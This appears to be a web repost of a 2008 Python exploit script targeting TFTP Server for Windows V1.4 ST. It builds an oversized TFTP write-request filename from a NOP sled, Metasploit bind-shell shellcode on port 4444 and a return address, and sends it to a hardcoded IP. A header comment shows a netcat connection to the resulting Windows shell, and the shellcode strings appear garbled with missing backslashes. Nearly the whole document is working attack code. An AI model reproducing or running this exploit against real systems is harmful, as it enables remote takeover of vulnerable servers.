Home / os

sourceforge-tftpd.py.txt

Posted on 27 March 2008

#!/usr/bin/python # TFTP Server for Windows V1.4 ST (0day) # http://sourceforge.net/projects/tftp-server/ # Tested on Windows Vista SP0. # Coded by Mati Aharoni # muts..at..offensive-security.com # http://www.offensive-security.com/0day/sourceforge-tftpd.py.txt ################################################################## # bt ~ # sourceforge-tftpd.py # [*] TFTP Server for Windows V1.4 ST (0day) # [*] http://www.offensive-security.com # [*] Sending evil packet, ph33r # [*] Check port 4444 for bindshell # bt ~ # nc -v 172.16.167.134 4444 # (UNKNOWN) [172.16.167.134] 4444 (krb524) open # Microsoft Windows [Version 6.0.6000] # Copyright (c) 2006 Microsoft Corporation. All # rights reserved. # # C:Windowssystem32> ################################################################## import socket import sys print "[*] TFTP Server for Windows V1.4 ST (0day)" print "[*] http://www.offensive-security.com" host = '172.16.167.134' port = 69 try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) except: print "socket() failed" sys.exit(1) # Jump back shellcode sc = "x6ax05x59xd9xeexd9x74x24xf4x5bx81x73x13x16x91x9c" sc +="x30x83xebxfcxe2xf4xcfx7fx45x44x32x65xc5xb0xd7x9b" sc +="x0cxcexdbx6fx51xcfxf7x91x9cx30" # windows/shell_bind_tcp - 317 bytes # http://www.metasploit.com # EXITFUNC=seh, LPORT=4444 shell=("xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8b" "x45x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01" "xebx49x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07" "xc1xcax0dx01xc2xebxf4x3bx54x24x28x75xe5x8bx5f" "x24x01xebx66x8bx0cx4bx8bx5fx1cx01xebx03x2cx8b" "x89x6cx24x1cx61xc3x31xdbx64x8bx43x30x8bx40x0c" "x8bx70x1cxadx8bx40x08x5ex68x8ex4ex0execx50xff" "xd6x66x53x66x68x33x32x68x77x73x32x5fx54xffxd0" "x68xcbxedxfcx3bx50xffxd6x5fx89xe5x66x81xedx08" "x02x55x6ax02xffxd0x68xd9x09xf5xadx57xffxd6x53" "x53x53x53x53x43x53x43x53xffxd0x66x68x11x5cx66" "x53x89xe1x95x68xa4x1ax70xc7x57xffxd6x6ax10x51" "x55xffxd0x68xa4xadx2exe9x57xffxd6x53x55xffxd0" "x68xe5x49x86x49x57xffxd6x50x54x54x55xffxd0x93" "x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64x66" "x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89" "xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38" "xabxabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57" "x52x51x51x51x6ax01x51x51x55x51xffxd0x68xadxd9" "x05xcex53xffxd6x6axffxffx37xffxd0x8bx57xfcx83" "xc4x64xffxd6x52xffxd0x68xf0x8ax04x5fx53xffxd6" "xffxd0") filename = "x90"*860 + shell + "x90"*14 + sc + "xebxd0x90x90" + "x2bx0ex41" mode = "netascii" muha = "x00x02" + filename+ "" + mode+ "" print "[*] Sending evil packet, ph33r" s.sendto(muha, (host, port)) print "[*] Check port 4444 for bindshell"

 

TOP